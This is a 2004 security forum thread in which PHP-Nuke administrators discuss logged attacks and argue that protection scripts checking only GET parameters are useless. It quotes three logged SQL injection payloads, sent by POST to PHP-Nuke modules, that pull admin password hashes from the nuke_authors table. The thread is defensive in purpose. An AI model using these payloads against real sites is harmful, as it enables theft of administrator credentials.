Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 589
Members: 0
Total: 589
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> Caution, fortress & co are useless
Post new topic  Reply to topic View previous topic :: View next topic 
Caution, fortress & co are useless
PostPosted: Sun Jun 06, 2004 10:11 am Reply with quote
Tora
Regular user
Regular user
 
Joined: May 19, 2004
Posts: 9
Location: Germany




Here are 3 examples from our detection log files:
Quote:
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
Quote:
request:
_GET[name] = Journal
_POST[file] = search
_POST[disp] = search
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Journal
REQUEST_URI: /modules.php?name=Journal
Quote:
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=FAQ
REQUEST_URI: /modules.php?name=FAQ

As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Here is a critical report over an older version of fortress. In addition, most described applies to the new version.
http://vkp.shiba.de/doku/fortress.htm
Sorry, only in german language...

best wishes and greetings from germany
Andi (aka Tora)


Last edited by Tora on Mon Jun 07, 2004 12:09 am; edited 1 time in total
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 06, 2004 11:16 am Reply with quote
SteX
Advanced user
Advanced user
 
Joined: May 18, 2004
Posts: 181
Location: Serbia




I never installed that shits of protect .. Smile

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Sun Jun 06, 2004 2:36 pm Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




Quote:
As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.



Script Kiddie


A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 06, 2004 4:00 pm Reply with quote
Tora
Regular user
Regular user
 
Joined: May 19, 2004
Posts: 9
Location: Germany




Quote:
Script Kiddie

Question Question Who is the script kiddie Question Question

_________________
Greetings from Germany
Andi aka Tora, SiteAdmin @ pragmamx.org pragmaMx developer-team
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 06, 2004 5:35 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Tora knows the stuff, its obvious from his posts. Scriptkiddies are beginners, who are learned, how to USE exploits, but they are not YET understanding fully, how it works. Tora has by my opinion advanced knowledge/skills in phpnuke/mysql and other stuff, he/she is definately not a scriptkiddie Cool Wink


argentino wrote:
Quote:
As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.



Script Kiddie


A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability
View user's profile Send private message Send e-mail Visit poster's website
Re: Caution, fortress & co are useless
PostPosted: Sun Jun 06, 2004 5:39 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yes, you are absolutely right - sanityzing only the GET parameters/QUERY string is useless and POST and COOKIE variables must be sanitized too. Because phpnuke globalizes all the GET/POST/COOKIE parameters and its not hard to attacker to inject mailicious requests through COOKIE for example...
I suggest to use Sentinel protection system. Its my favorite in this moment and it will add good security layer between potential attackers and website.

Tora wrote:
Here are 3 examples from our detection log files:
Quote:
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
Quote:
request:
_GET[name] = Journal
_POST[file] = search
_POST[disp] = search
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=Journal
REQUEST_URI: /modules.php?name=Journal
Quote:
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=FAQ
REQUEST_URI: /modules.php?name=FAQ

As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Here is a critical report over an older version of fortress. In addition, most described applies to the new version.
http://vkp.shiba.de/doku/fortress.htm
Sorry, only in german language...

best wishes and greetings from germany
Andi (aka Tora)
View user's profile Send private message Send e-mail Visit poster's website
Caution, fortress & co are useless
  www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.125 Seconds